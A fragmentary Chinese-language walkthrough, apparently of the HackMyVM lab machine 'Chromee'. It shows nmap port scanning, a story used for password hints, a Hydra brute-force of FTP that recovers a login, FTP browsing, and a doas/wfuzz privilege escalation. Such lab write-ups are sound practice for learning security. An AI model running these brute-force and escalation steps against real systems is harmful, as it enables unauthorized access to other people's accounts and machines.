3 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 2.402 seconds (106.58 hosts/sec). 3 responded
ip为192.168.31.100,然后用nmap扫描端口
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
┌──(root㉿kali)-[~/Desktop/tmp] └─# nmap 192.168.31.100 -p- Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-21 07:14 EDT Nmap scan report for chromee.hmv (192.168.31.100) Host is up (0.0019s latency). Not shown: 65531 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 8080/tcp open http-proxy 23333/tcp open elxmgmt MAC Address: 08:00:27:F9:E1:65 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 7.02 seconds
The Lost Key Lily, a curious girl, found an old rusty key in the woods. Wondering where it belonged, she asked everyone in the village, but no one knew. One day, she discovered a locked stone well. To her surprise, the key fit. She opened it and descended into a hidden passage. There, she found an ancient chest filled with treasures. But the real treasure was a note inside: “The greatest treasure is the journey, not the prize.” Lily smiled, realizing the adventure was the real reward.
┌──(root㉿kali)-[~/Desktop/tmp/test] └─# hydra -L ./name -P ./pass 192.168.31.100 ftp -s 23333 -f -t 50 Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-21 07:32:30 [DATA] max 50 tasks per 1 server, overall 50 tasks, 208 login tries (l:2/p:104), ~5 tries per task [DATA] attacking ftp://192.168.31.100:23333/ [23333][ftp] host: 192.168.31.100 login: adriana password: Lily2020 [STATUS] attack finished for 192.168.31.100 (valid pair found) 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-21 07:32:31
爆破出了账号密码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
┌──(root㉿kali)-[~/Desktop/tmp/test] └─# ftp adriana@192.168.31.100 23333 Connected to 192.168.31.100. 220 (vsFTPd 3.0.3) 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -al 229 Entering Extended Passive Mode (|||20808|) 150 Here comes the directory listing. drwxr-xr-x 2 106 115 4096 Mar 09 08:13 . drwxr-xr-x 4 0 0 4096 Mar 09 08:12 .. -rw-r--r-- 1 0 0 3414 Mar 09 08:13 ... -rw-r--r-- 1 0 0 495 Mar 07 14:40 dic.txt 226 Directory send OK.
follower@Chromee:~$ /usr/local/bin/doas -u softly /usr/local/bin/wfuzz -z file -u "127.0.0.1" Password: /usr/local/lib/python3.9/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. softly@Chromee:/home/follower$